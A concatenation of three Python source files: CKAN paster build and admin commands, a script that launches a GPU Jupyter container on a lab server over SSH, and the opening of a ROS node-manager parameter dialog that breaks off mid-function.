translation += '-' * (length - position)
entry.msgstr = translation
out_dir = os.path.join(self.i18n_path, 'zh_TW', 'LC_MESSAGES')
try:
os.makedirs(out_dir)
except OSError:
pass
po.metadata['Plural-Forms'] = "nplurals=1; plural=0\n"
out_po = os.path.join(out_dir, 'ckan.po')
out_mo = os.path.join(out_dir, 'ckan.mo')
po.save(out_po)
po.save_as_mofile(out_mo)
print('zh_TW has been mangled')
class MinifyCommand(CkanCommand):
'''Create minified versions of the given Javascript and CSS files.
Usage:
paster minify [--clean] PATH
for example:
paster minify ckan/public/base
paster minify ckan/public/base/css/*.css
paster minify ckan/public/base/css/red.css
if the --clean option is provided any minified files will be removed.
'''
summary = __doc__.split('\n')[0]
usage = __doc__
min_args = 1
exclude_dirs = ['vendor']
def __init__(self, name):
super(MinifyCommand, self).__init__(name)
self.parser.add_option('--clean', dest='clean',
action='store_true', default=False,
help='remove any minified files in the path')
def command(self):
clean = getattr(self.options, 'clean', False)
self._load_config()
for base_path in self.args:
if os.path.isfile(base_path):
if clean:
self.clear_minifyed(base_path)
else:
self.minify_file(base_path)
elif os.path.isdir(base_path):
for root, dirs, files in os.walk(base_path):
dirs[:] = [d for d in dirs if not d in self.exclude_dirs]
for filename in files:
path = os.path.join(root, filename)
if clean:
self.clear_minifyed(path)
else:
self.minify_file(path)
else:
# Path is neither a file or a dir?
continue
def clear_minifyed(self, path):
path_only, extension = os.path.splitext(path)
if extension not in ('.css', '.js'):
# This is not a js or css file.
return
if path_only.endswith('.min'):
print('removing %s' % path)
os.remove(path)
def minify_file(self, path):
'''Create the minified version of the given file.
If the file is not a .js or .css file (e.g. it's a .min.js or .min.css
file, or it's some other type of file entirely) it will not be
minifed.
:param path: The path to the .js or .css file to minify
'''
import ckan.lib.fanstatic_resources as fanstatic_resources
path_only, extension = os.path.splitext(path)
if path_only.endswith('.min'):
# This is already a minified file.
return
if extension not in ('.css', '.js'):
# This is not a js or css file.
return
path_min = fanstatic_resources.min_path(path)
source = open(path, 'r').read()
f = open(path_min, 'w')
if path.endswith('.css'):
f.write(rcssmin.cssmin(source))
elif path.endswith('.js'):
f.write(rjsmin.jsmin(source))
f.close()
print("Minified file '{0}'".format(path))
class LessCommand(CkanCommand):
'''Compile all root less documents into their CSS counterparts
Usage:
paster less
'''
summary = __doc__.split('\n')[0]
usage = __doc__
min_args = 0
def command(self):
self._load_config()
self.less()
custom_css = {
'fuchsia': '''
@layoutLinkColor: #E73892;
@footerTextColor: mix(#FFF, @layoutLinkColor, 60%);
@footerLinkColor: @footerTextColor;
@mastheadBackgroundColor: @layoutLinkColor;
@btnPrimaryBackground: lighten(@layoutLinkColor, 10%);
@btnPrimaryBackgroundHighlight: @layoutLinkColor;
''',
'green': '''
@layoutLinkColor: #2F9B45;
@footerTextColor: mix(#FFF, @layoutLinkColor, 60%);
@footerLinkColor: @footerTextColor;
@mastheadBackgroundColor: @layoutLinkColor;
@btnPrimaryBackground: lighten(@layoutLinkColor, 10%);
@btnPrimaryBackgroundHighlight: @layoutLinkColor;
''',
'red': '''
@layoutLinkColor: #C14531;
@footerTextColor: mix(#FFF, @layoutLinkColor, 60%);
@footerLinkColor: @footerTextColor;
@mastheadBackgroundColor: @layoutLinkColor;
@btnPrimaryBackground: lighten(@layoutLinkColor, 10%);
@btnPrimaryBackgroundHighlight: @layoutLinkColor;
''',
'maroon': '''
@layoutLinkColor: #810606;
@footerTextColor: mix(#FFF, @layoutLinkColor, 60%);
@footerLinkColor: @footerTextColor;
@mastheadBackgroundColor: @layoutLinkColor;
@btnPrimaryBackground: lighten(@layoutLinkColor, 10%);
@btnPrimaryBackgroundHighlight: @layoutLinkColor;
''',
}
def less(self):
''' Compile less files '''
import subprocess
command = 'npm bin'
process = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, universal_newlines=True)
output = process.communicate()
directory = output[0].strip()
less_bin = os.path.join(directory, 'lessc')
public = config.get(u'ckan.base_public_folder')
root = os.path.join(os.path.dirname(__file__), '..', public, 'base')
root = os.path.abspath(root)
custom_less = os.path.join(root, 'less', 'custom.less')
for color in self.custom_css:
f = open(custom_less, 'w')
f.write(self.custom_css[color])
f.close()
self.compile_less(root, less_bin, color)
f = open(custom_less, 'w')
f.write('// This file is needed in order for ./bin/less to compile in less 1.3.1+\n')
f.close()
self.compile_less(root, less_bin, 'main')
def compile_less(self, root, less_bin, color):
import subprocess
for dir_prefix in ['', '-rtl']:
print('compile %s.css' % (color + dir_prefix))
main_less = os.path.join(root, 'less', 'main%s.less' % dir_prefix)
main_css = os.path.join(root, 'css', '%s.css' % (color + dir_prefix))
command = '%s %s %s' % (less_bin, main_less, main_css)
process = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, universal_newlines=True)
output = process.communicate()
print(output)
class FrontEndBuildCommand(CkanCommand):
'''Creates and minifies css and JavaScript files
Usage:
paster front-end-build
'''
summary = __doc__.split('\n')[0]
usage = __doc__
min_args = 0
def command(self):
self._load_config()
# Less css
cmd = LessCommand('less')
cmd.options = self.options
cmd.command()
# js translation strings
cmd = TranslationsCommand('trans')
cmd.options = self.options
cmd.args = ('js',)
cmd.command()
# minification
cmd = MinifyCommand('minify')
cmd.options = self.options
public = config.get(u'ckan.base_public_folder')
root = os.path.join(os.path.dirname(__file__), '..', public, 'base')
root = os.path.abspath(root)
ckanext = os.path.join(os.path.dirname(__file__), '..', '..', 'ckanext')
ckanext = os.path.abspath(ckanext)
cmd.args = (root, ckanext)
cmd.command()
class ViewsCommand(CkanCommand):
'''Manage resource views.
Usage:
paster views create [options] [type1] [type2] ...
Create views on relevant resources. You can optionally provide
specific view types (eg `recline_view`, `image_view`). If no types
are provided, the default ones will be used. These are generally
the ones defined in the `ckan.views.default_views` config option.
Note that on either case, plugins must be loaded (ie added to
`ckan.plugins`), otherwise the command will stop.
paster views clear [options] [type1] [type2] ...
Permanently delete all views or the ones with the provided types.
paster views clean
Permanently delete views for all types no longer present in the
`ckan.plugins` configuration option.
'''
summary = __doc__.split('\n')[0]
usage = __doc__
min_args = 1
def __init__(self, name):
super(ViewsCommand, self).__init__(name)
self.parser.add_option('-y', '--yes', dest='assume_yes',
action='store_true',
default=False,
help='''Automatic yes to prompts. Assume "yes"
as answer to all prompts and run non-interactively''')
self.parser.add_option('-d', '--dataset', dest='dataset_id',
action='append',
help='''Create views on a particular dataset.
You can use the dataset id or name, and it can be defined multiple times.''')
self.parser.add_option('--no-default-filters',
dest='no_default_filters',
action='store_true',
default=False,
help='''Do not add default filters for relevant
resource formats for the view types provided. Note that filters are not added
by default anyway if an unsupported view type is provided or when using the
`-s` or `-d` options.''')
self.parser.add_option('-s', '--search', dest='search_params',
action='store',
default=False,
help='''Extra search parameters that will be
used for getting the datasets to create the resource views on. It must be a
JSON object like the one used by the `package_search` API call. Supported
fields are `q`, `fq` and `fq_list`. Check the documentation for examples.
Not used when using the `-d` option.''')
def command(self):
self._load_config()
if not self.args:
print(self.usage)
elif self.args[0] == 'create':
view_plugin_types = self.args[1:]
self.create_views(view_plugin_types)
elif self.args[0] == 'clear':
view_plugin_types = self.args[1:]
self.clear_views(view_plugin_types)
elif self.args[0] == 'clean':
self.clean_views()
else:
print(self.usage)
_page_size = 100
def _get_view_plugins(self, view_plugin_types,
get_datastore_views=False):
'''
Returns the view plugins that were succesfully loaded
Views are provided as a list of ``view_plugin_types``. If no types are
provided, the default views defined in the ``ckan.views.default_views``
will be created. Only in this case (when the default view plugins are
used) the `get_datastore_views` parameter can be used to get also view
plugins that require data to be in the DataStore.
If any of the provided plugins could not be loaded (eg it was not added
to `ckan.plugins`) the command will stop.
Returns a list of loaded plugin names.
'''
from ckan.lib.datapreview import (get_view_plugins,
get_default_view_plugins
)
log = logging.getLogger(__name__)
view_plugins = []
if not view_plugin_types:
log.info('No view types provided, using default types')
view_plugins = get_default_view_plugins()
if get_datastore_views:
view_plugins.extend(
get_default_view_plugins(get_datastore_views=True))
else:
view_plugins = get_view_plugins(view_plugin_types)
loaded_view_plugins = [view_plugin.info()['name']
for view_plugin in view_plugins]
plugins_not_found = list(set(view_plugin_types) -
set(loaded_view_plugins))
if plugins_not_found:
error('View plugin(s) not found : {0}. '.format(plugins_not_found)
+ 'Have they been added to the `ckan.plugins` configuration'
+ ' option?')
return loaded_view_plugins
def _add_default_filters(self, search_data_dict, view_types):
'''
Adds extra filters to the `package_search` dict for common view types
It basically adds `fq` parameters that filter relevant resource formats
for the view types provided. For instance, if one of the view types is
`pdf_view` the following will be added to the final query:
fq=res_format:"pdf" OR res_format:"PDF"
This obviously should only be used if all view types are known and can
be filtered, otherwise we want all datasets to be returned. If a
non-filterable view type is provided, the search params are not
modified.
Returns the provided data_dict for `package_search`, optionally
modified with extra filters.
'''
from ckanext.imageview.plugin import DEFAULT_IMAGE_FORMATS
from ckanext.textview.plugin import get_formats as get_text_formats
from ckanext.datapusher.plugin import DEFAULT_FORMATS as \
datapusher_formats
filter_formats = []
for view_type in view_types:
if view_type == 'image_view':
for _format in DEFAULT_IMAGE_FORMATS:
filter_formats.extend([_format, _format.upper()])
elif view_type == 'text_view':
formats = get_text_formats(config)
for _format in itertools.chain.from_iterable(formats.values()):
filter_formats.extend([_format, _format.upper()])
elif view_type == 'pdf_view':
filter_formats.extend(['pdf', 'PDF'])
elif view_type in ['recline_view', 'recline_grid_view',
'recline_graph_view', 'recline_map_view']:
if datapusher_formats[0] in filter_formats:
continue
for _format in datapusher_formats:
if '/' not in _format:
filter_formats.extend([_format, _format.upper()])
else:
# There is another view type provided so we can't add any
# filter
return search_data_dict
filter_formats_query = ['+res_format:"{0}"'.format(_format)
for _format in filter_formats]
search_data_dict['fq_list'].append(' OR '.join(filter_formats_query))
return search_data_dict
def _update_search_params(self, search_data_dict):
'''
Update the `package_search` data dict with the user provided parameters
Supported fields are `q`, `fq` and `fq_list`.
If the provided JSON object can not be parsed the process stops with
an error.
Returns the updated data dict
'''
log = logging.getLogger(__name__)
if not self.options.search_params:
return search_data_dict
try:
user_search_params = json.loads(self.options.search_params)
except ValueError as e:
error('Unable to parse JSON search parameters: {0}'.format(e))
if user_search_params.get('q'):
search_data_dict['q'] = user_search_params['q']
if user_search_params.get('fq'):
if search_data_dict['fq']:
search_data_dict['fq'] += ' ' + user_search_params['fq']
else:
search_data_dict['fq'] = user_search_params['fq']
if (user_search_params.get('fq_list') and
isinstance(user_search_params['fq_list'], list)):
search_data_dict['fq_list'].extend(user_search_params['fq_list'])
def _search_datasets(self, page=1, view_types=[]):
'''
Perform a query with `package_search` and return the result
Results can be paginated using the `page` parameter
'''
n = self._page_size
search_data_dict = {
'q': '',
'fq': '',
'fq_list': [],
'include_private': True,
'rows': n,
'start': n * (page - 1),
}
if self.options.dataset_id:
search_data_dict['q'] = ' OR '.join(
['id:{0} OR name:"{0}"'.format(dataset_id)
for dataset_id in self.options.dataset_id]
)
elif self.options.search_params:
self._update_search_params(search_data_dict)
elif not self.options.no_default_filters:
self._add_default_filters(search_data_dict, view_types)
if not search_data_dict.get('q'):
search_data_dict['q'] = '*:*'
query = p.toolkit.get_action('package_search')(
{}, search_data_dict)
return query
def create_views(self, view_plugin_types=[]):
from ckan.lib.datapreview import add_views_to_dataset_resources
log = logging.getLogger(__name__)
datastore_enabled = 'datastore' in config['ckan.plugins'].split()
loaded_view_plugins = self._get_view_plugins(view_plugin_types,
datastore_enabled)
context = {'user': self.site_user['name']}
page = 1
while True:
query = self._search_datasets(page, loaded_view_plugins)
if page == 1 and query['count'] == 0:
error('No datasets to create resource views on, exiting...')
elif page == 1 and not self.options.assume_yes:
msg = ('\nYou are about to check {0} datasets for the ' +
'following view plugins: {1}\n' +
' Do you want to continue?')
confirm = query_yes_no(msg.format(query['count'],
loaded_view_plugins))
if confirm == 'no':
error('Command aborted by user')
if query['results']:
for dataset_dict in query['results']:
if not dataset_dict.get('resources'):
continue
views = add_views_to_dataset_resources(
context,
dataset_dict,
view_types=loaded_view_plugins)
if views:
view_types = list(set([view['view_type']
for view in views]))
msg = ('Added {0} view(s) of type(s) {1} to ' +
'resources from dataset {2}')
log.debug(msg.format(len(views),
', '.join(view_types),
dataset_dict['name']))
if len(query['results']) < self._page_size:
break
page += 1
else:
break
log.info('Done')
def clear_views(self, view_plugin_types=[]):
log = logging.getLogger(__name__)
if not self.options.assume_yes:
if view_plugin_types:
msg = 'Are you sure you want to delete all resource views ' + \
'of type {0}?'.format(', '.join(view_plugin_types))
else:
msg = 'Are you sure you want to delete all resource views?'
result = query_yes_no(msg, default='no')
if result == 'no':
error('Command aborted by user')
context = {'user': self.site_user['name']}
logic.get_action('resource_view_clear')(
context, {'view_types': view_plugin_types})
log.info('Done')
def clean_views(self):
names = []
for plugin in p.PluginImplementations(p.IResourceView):
names.append(str(plugin.info()['name']))
results = model.ResourceView.get_count_not_in_view_types(names)
if not results:
print('No resource views to delete')
return
print('This command will delete.\n')
for row in results:
print('%s of type %s' % (row[1], row[0]))
result = query_yes_no('Do you want to delete these resource views:', default='no')
if result == 'no':
print('Not Deleting.')
return
model.ResourceView.delete_not_in_view_types(names)
model.Session.commit()
print('Deleted resource views.')
class ConfigToolCommand(paste.script.command.Command):
'''Tool for editing options in a CKAN config file
paster config-tool <default.ini> <key>=<value> [<key>=<value> ...]
paster config-tool <default.ini> -f <custom_options.ini>
Examples:
paster config-tool default.ini sqlalchemy.url=123 'ckan.site_title=ABC'
paster config-tool default.ini -s server:main -e port=8080
paster config-tool default.ini -f custom_options.ini
'''
parser = paste.script.command.Command.standard_parser(verbose=True)
default_verbosity = 1
group_name = 'ckan'
usage = __doc__
summary = usage.split('\n')[0]
parser.add_option('-s', '--section', dest='section',
default='app:main', help='Section of the config file')
parser.add_option(
'-e', '--edit', action='store_true', dest='edit', default=False,
help='Checks the option already exists in the config file')
parser.add_option(
'-f', '--file', dest='merge_filepath', metavar='FILE',
help='Supply an options file to merge in')
def command(self):
import config_tool
if len(self.args) < 1:
self.parser.error('Not enough arguments (got %i, need at least 1)'
% len(self.args))
config_filepath = self.args[0]
if not os.path.exists(config_filepath):
self.parser.error('Config filename %r does not exist.' %
config_filepath)
if self.options.merge_filepath:
config_tool.config_edit_using_merge_file(
config_filepath, self.options.merge_filepath)
options = self.args[1:]
if not (options or self.options.merge_filepath):
self.parser.error('No options provided')
if options:
for option in options:
if '=' not in option:
error(
'An option does not have an equals sign: %r '
'It should be \'key=value\'. If there are spaces '
'you\'ll need to quote the option.\n' % option)
try:
config_tool.config_edit_using_option_strings(
config_filepath, options, self.options.section,
edit=self.options.edit)
except config_tool.ConfigToolError as e:
error(traceback.format_exc())
class JobsCommand(CkanCommand):
'''Manage background jobs
Usage:
paster jobs worker [--burst] [QUEUES]
Start a worker that fetches jobs from queues and executes
them. If no queue names are given then the worker listens
to the default queue, this is equivalent to
paster jobs worker default
If queue names are given then the worker listens to those
queues and only those:
paster jobs worker my-custom-queue
Hence, if you want the worker to listen to the default queue
and some others then you must list the default queue explicitly:
paster jobs worker default my-custom-queue
If the `--burst` option is given then the worker will exit
as soon as all its queues are empty.
paster jobs list [QUEUES]
List currently enqueued jobs from the given queues. If no queue
names are given then the jobs from all queues are listed.
paster jobs show ID
Show details about a specific job.
paster jobs cancel ID
Cancel a specific job. Jobs can only be canceled while they are
enqueued. Once a worker has started executing a job it cannot
be aborted anymore.
paster jobs clear [QUEUES]
Cancel all jobs on the given queues. If no queue names are
given then ALL queues are cleared.
paster jobs test [QUEUES]
Enqueue a test job. If no queue names are given then the job is
added to the default queue. If queue names are given then a
separate test job is added to each of the queues.
'''
summary = __doc__.split(u'\n')[0]
usage = __doc__
min_args = 0
def __init__(self, *args, **kwargs):
super(JobsCommand, self).__init__(*args, **kwargs)
try:
self.parser.add_option(u'--burst', action='store_true',
default=False,
help=u'Start worker in burst mode.')
except OptionConflictError:
# Option has already been added in previous call
pass
def command(self):
self._load_config()
try:
cmd = self.args.pop(0)
except IndexError:
print(self.__doc__)
sys.exit(0)
if cmd == u'worker':
self.worker()
elif cmd == u'list':
self.list()
elif cmd == u'show':
self.show()
elif cmd == u'cancel':
self.cancel()
elif cmd == u'clear':
self.clear()
elif cmd == u'test':
self.test()
else:
error(u'Unknown command "{}"'.format(cmd))
def worker(self):
from ckan.lib.jobs import Worker
Worker(self.args).work(burst=self.options.burst)
def list(self):
data_dict = {
u'queues': self.args,
}
jobs = p.toolkit.get_action(u'job_list')({}, data_dict)
for job in jobs:
if job[u'title'] is None:
job[u'title'] = ''
else:
job[u'title'] = u'"{}"'.format(job[u'title'])
print(u'{created} {id} {queue} {title}'.format(**job))
def show(self):
if not self.args:
error(u'You must specify a job ID')
id = self.args[0]
try:
job = p.toolkit.get_action(u'job_show')({}, {u'id': id})
except logic.NotFound:
error(u'There is no job with ID "{}"'.format(id))
print(u'ID: {}'.format(job[u'id']))
if job[u'title'] is None:
title = u'None'
else:
title = u'"{}"'.format(job[u'title'])
print(u'Title: {}'.format(title))
print(u'Created: {}'.format(job[u'created']))
print(u'Queue: {}'.format(job[u'queue']))
def cancel(self):
if not self.args:
error(u'You must specify a job ID')
id = self.args[0]
try:
p.toolkit.get_action(u'job_cancel')({}, {u'id': id})
except logic.NotFound:
error(u'There is no job with ID "{}"'.format(id))
print(u'Cancelled job {}'.format(id))
def clear(self):
data_dict = {
u'queues': self.args,
}
queues = p.toolkit.get_action(u'job_clear')({}, data_dict)
queues = (u'"{}"'.format(q) for q in queues)
print(u'Cleared queue(s) {}'.format(u', '.join(queues)))
def test(self):
from ckan.lib.jobs import DEFAULT_QUEUE_NAME, enqueue, test_job
for queue in (self.args or [DEFAULT_QUEUE_NAME]):
job = enqueue(test_job, [u'A test job'], title=u'A test job', queue=queue)
print(u'Added test job {} to queue "{}"'.format(job.id, queue))
|
frython.py
|
#!/usr/bin/env python
# a simple script to set up a GPU-enabled Jupyter notebook on Fry/Fry2
# assumes you have an account on there already
import argparse
import signal
import subprocess
import threading
import time
import webbrowser
# TODO: have some kinda config file for this
def launch_tab(port):
time.sleep(5)
webbrowser.get("chrome").open_new_tab(f"http://localhost:{port}")
def main():
parser = argparse.ArgumentParser(
prog="frython",
description=(
"Launch a docker instance on Fry (default: TensorFlow)\n"
"and forward it to a local port so you can use jupyter"
),
)
parser.add_argument("-u", "--username", required=True, help="Username on Fry")
parser.add_argument(
"-p", "--port", type=int, required=True, help="Port to use on Fry and locally"
)
parser.add_argument("-g", "--gpus", required=True, help="GPU(s) to use. Be nice!")
parser.add_argument(
"-c",
"--container",
default="gcr.io/tensorflow/tensorflow:latest-gpu-py3",
help="Container to run. Default: latest tensorflow-gpu-py3",
)
parser.add_argument("-x", "--command", default=None)
parser.add_argument("--server", default="fry", choices=("fry", "fry2"))
args = parser.parse_args()
gpu_cmd = [
"ssh",
"-tt",
"{}@{}".format(args.username, args.server),
" ".join(
(
f"NV_GPU={args.gpus} nvidia-docker run -it --rm",
f"-p {args.port}:8888",
f"-v /home/{args.username}:/notebooks/{args.username}",
args.container,
args.command or "",
)
),
]
port_cmd = [
"ssh",
"-NL",
"localhost:{}:localhost:{}".format(args.port, args.port),
"{}@{}".format(args.username, args.server),
]
print("Running\n\t{}".format(" ".join(port_cmd)))
port_proc = subprocess.Popen(" ".join(port_cmd), shell=True)
tab = threading.Thread(target=launch_tab, args=(args.port,))
tab.start()
print("Running\n\t{}".format(" ".join(gpu_cmd)))
gpu_proc = subprocess.call(" ".join(gpu_cmd), shell=True)
port_proc.send_signal(signal.SIGKILL)
|
parameter_dialog.py
|
# Software License Agreement (BSD License)
#
# Copyright (c) 2012, Fraunhofer FKIE/US, Alexander Tiderko
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of Fraunhofer nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
from python_qt_binding.QtCore import Qt, Signal
from python_qt_binding.QtGui import QBrush, QColor, QIcon, QPalette
from xmlrpclib import Binary
import os
import roslib.msgs
import roslib.names
import rospy
import sys
import threading
from node_manager_fkie.detailed_msg_box import WarningMessageBox
from node_manager_fkie.editor.line_edit import EnchancedLineEdit
from node_manager_fkie.parameter_handler import ParameterHandler
import node_manager_fkie as nm
try:
from python_qt_binding.QtGui import QApplication, QComboBox, QCheckBox, QLineEdit, QMessageBox, QScrollArea, QWidget
from python_qt_binding.QtGui import QFormLayout, QHBoxLayout, QVBoxLayout, QSpacerItem, QSizePolicy
from python_qt_binding.QtGui import QFrame, QDialog, QDialogButtonBox, QFileDialog, QLabel, QPushButton, QTextEdit
except:
from python_qt_binding.QtWidgets import QApplication, QComboBox, QCheckBox, QLineEdit, QMessageBox, QScrollArea, QWidget
from python_qt_binding.QtWidgets import QFormLayout, QHBoxLayout, QVBoxLayout, QSpacerItem, QSizePolicy
from python_qt_binding.QtWidgets import QFrame, QDialog, QDialogButtonBox, QFileDialog, QLabel, QPushButton, QTextEdit
def str2bool(val):
return val.lower() in ("yes", "true", "t", "1")
class MyComboBox(QComboBox):
remove_item_signal = Signal(str)
def __init__(self, parent=None):
QComboBox.__init__(self, parent=parent)
self.parameter_description = None
def keyPressEvent(self, event):
key_mod = QApplication.keyboardModifiers()
if key_mod & Qt.ShiftModifier and (event.key() == Qt.Key_Delete):
try:
curr_text = self.currentText()
if curr_text:
for i in range(self.count()):
if curr_text == self.itemText(i):
self.removeItem(i)
self.remove_item_signal.emit(curr_text)
self.clearEditText()
except:
import traceback
print traceback.format_exc(1)
QComboBox.keyPressEvent(self, event)
class ParameterDescription(object):
'''
Used for internal representation of the parameter in dialog.
'''
def __init__(self, name, msg_type, value=None, widget=None):
self._name = str(name)
self._type = msg_type
if isinstance(self._type, dict):
self._type = 'dict'
elif isinstance(self._type, list):
self._type = 'list'
self._value = value
self._value_org = value
self._widget = widget
try:
self._base_type, self._is_array_type, self._array_length = roslib.msgs.parse_type(self._type)
except:
pass
if msg_type == 'binary':
self._base_type = msg_type
def __repr__(self):
return ''.join([self._name, ' [', self._type, ']'])
def origin_value(self):
return self._value_org
def changed(self):
return unicode(self.origin_value()) != unicode(self._value)
def name(self):
return self._name
def setWidget(self, widget):
self._widget = widget
if widget is not None:
widget.parameter_description = self
self.addCachedValuesToWidget()
def widget(self):
return self._widget
def fullName(self):
result = self.name()
widget = self._widget
while widget is not None:
if isinstance(widget, (MainBox, GroupBox, ArrayBox)):
result = roslib.names.ns_join(widget.name, result)
widget = widget.parent()
return result
def isArrayType(self):
# handle representation of `rosparam`
return self._is_array_type or self._type in ['[]']
def arrayLength(self):
return self._array_length
def isPrimitiveType(self):
result = self._base_type in roslib.msgs.PRIMITIVE_TYPES
result = result or self._base_type in ['int', 'float', 'time', 'duration', 'binary']
# if value is a string, the list is represented as a string, see `rosparam`
result = result or self._type in ['[]']
return result
def isTimeType(self):
return self._base_type in ['time', 'duration']
def isBinaryType(self):
return self._base_type in ['binary']
def baseType(self):
return self._base_type
def updateValueFromField(self):
field = self.widget()
result = ''
if isinstance(field, QCheckBox):
result = repr(field.isChecked())
elif isinstance(field, QLineEdit):
result = field.text()
elif isinstance(field, QComboBox):
result = field.currentText()
self.updateValue(result)
def updateValue(self, value):
try:
if isinstance(value, (dict, list)):
self._value = value
elif value:
nm.history().addParamCache(self.fullName(), value)
if self.isArrayType():
if 'int' in self.baseType() or 'byte' in self.baseType():
self._value = map(int, value.lstrip('[').rstrip(']').split(','))
elif 'float' in self.baseType():
self._value = map(float, value.lstrip('[').rstrip(']').split(','))
elif 'bool' in self.baseType():
self._value = map(str2bool, value.lstrip('[').rstrip(']').split(','))
elif self.isBinaryType():
self._value = value
else:
try:
import yaml
self._value = yaml.load("[%s]" % value)
# if there is no YAML, load() will return an
# empty string. We want an empty dictionary instead
# for our representation of empty.
if self._value is None:
self._value = []
except yaml.MarkedYAMLError, e:
raise Exception("Field [%s] yaml error: %s" % (self.fullName(), str(e)))
if not self.arrayLength() is None and self.arrayLength() != len(self._value):
raise Exception(''.join(["Field [", self.fullName(), "] has incorrect number of elements: ", str(len(self._value)), " != ", str(self.arrayLength())]))
else:
if 'int' in self.baseType() or 'byte' in self.baseType():
self._value = int(value)
elif 'float' in self.baseType():
self._value = float(value)
elif 'bool' in self.baseType():
if isinstance(value, bool):
self._value = value
else:
self._value = str2bool(value)
elif self.isBinaryType():
self._value = unicode(value)
elif self.isTimeType():
if value == 'now':
self._value = 'now'
else:
try:
val = eval(value)
if isinstance(val, dict):
self._value = val
else:
secs = int(val)
nsecs = int((val - secs) * 1000000000)
self._value = {'secs': secs, 'nsecs': nsecs}
except:
self._value = {'secs': 0, 'nsecs': 0}
else:
self._value = value.encode(sys.getfilesystemencoding())
else:
if self.isArrayType():
arr = []
self._value = arr
else:
if 'int' in self.baseType() or 'byte' in self.baseType():
self._value = 0
elif 'float' in self.baseType():
self._value = 0.0
elif 'bool' in self.baseType():
self._value = False
elif self.isBinaryType():
self._value = unicode(value)
elif self.isTimeType():
self._value = {'secs': 0, 'nsecs': 0}
else:
self._value = ''
nm.history().addParamCache(self.fullName(), value)
except Exception, e:
raise Exception(''.join(["Error while set value '", unicode(value), "' for '", self.fullName(), "': ", str(e)]))
return self._value
def value(self):
if not self.isPrimitiveType() and not self.widget() is None:
return self.widget().value()
elif self.isPrimitiveType():
self.updateValueFromField()
# if self.isTimeType() and self._value == 'now':
# # FIX: rostopic does not support 'now' values in sub-headers
# t = time.time()
# return ({'secs': int(t), 'nsecs': int((t-int(t))*1000000)}, self.changed())
return (self._value, self.changed())
def removeCachedValue(self, value):
nm.history().removeParamCache(self.fullName(), value)
def createTypedWidget(self, parent):
result = None
if self.isPrimitiveType():
value = self._value
if 'bool' in self.baseType():
result = QCheckBox(parent=parent)
result.setObjectName(self.name())
if not isinstance(value, bool):
value = str2bool(value[0] if isinstance(value, list) else value)
self._value_org = value
result.setChecked(value)
else:
result = MyComboBox(parent=parent)
result.setObjectName(self.name())
result.setSizePolicy(QSizePolicy(QSizePolicy.Expanding, QSizePolicy.Fixed))
result.setEditable(True)
result.remove_item_signal.connect(self.removeCachedValue)
items = []
if isinstance(value, list):
if self.isArrayType():
items.append(','.join([str(val) for val in value]))
else:
items[len(items):] = value
else:
if value is not None and value:
items.append(unicode(value) if not isinstance(value, Binary) else '{binary data!!! updates will be ignored!!!}')
elif self.isTimeType():
items.append('now')
self._value_org = items[0] if items else ''
result.addItems(items)
else:
if self.isArrayType():
result = ArrayBox(self.name(), self._type, parent=parent)
else:
result = GroupBox(self.name(), self._type, parent=parent)
return result
def addCachedValuesToWidget(self):
if isinstance(self.widget(), QComboBox):
values = nm.history().cachedParamValues(self.fullName())
for i in range(self.widget().count()):
try:
values.remove(self.widget().itemText(i))
except:
pass
if self.widget().count() == 0:
values.insert(0, '')
self.widget().addItems(values)
class MainBox(QWidget):
'''
Groups the parameter without visualization of the group. It is the main widget.
'''
def __init__(self, name, param_type, collapsible=True, parent=None):
QWidget.__init__(self, parent)
self.setObjectName(name)
self.name = name
self.type = param_type
self.params = []
self.collapsed = False
self.parameter_description = None
vLayout = QVBoxLayout()
vLayout.setSpacing(0)
self.options_layout = QHBoxLayout()
self.param_widget = QFrame()
self.name_label = QLabel(name)
font = self.name_label.font()
font.setBold(True)
self.name_label.setFont(font)
self.type_label = QLabel(''.join([' (', param_type, ')']))
if collapsible:
self.hide_button = QPushButton('-')
self.hide_button.setFlat(True)
self.hide_button.setMaximumSize(20, 20)
self.hide_button.clicked.connect(self._on_hide_clicked)
self.options_layout.addWidget(self.hide_button)
self.options_layout.addWidget(self.name_label)
self.options_layout.addWidget(self.type_label)
self.options_layout.addStretch()
vLayout.addLayout(self.options_layout)
self.param_widget.setFrameShape(QFrame.Box)
self.param_widget.setFrameShadow(QFrame.Raised)
boxLayout = QFormLayout()
boxLayout.setVerticalSpacing(0)
self.param_widget.setLayout(boxLayout)
vLayout.addWidget(self.param_widget)
self.setLayout(vLayout)
if param_type in ['std_msgs/Header']:
self.setCollapsed(True)
def setCollapsed(self, value):
self.collapsed = value
self.param_widget.setVisible(not value)
self.hide_button.setText('+' if self.collapsed else '-')
def _on_hide_clicked(self):
self.setCollapsed(not self.collapsed)
# self.param_widget.setVisible(not self.param_widget.isVisible())
# vis = self.param_widget.isVisible()
# self.hide_button.setText('-' if vis else '+')
def createFieldFromValue(self, value):
self.setUpdatesEnabled(False)
try:
if isinstance(value, (dict, list)):
self._createFieldFromDict(value)
finally:
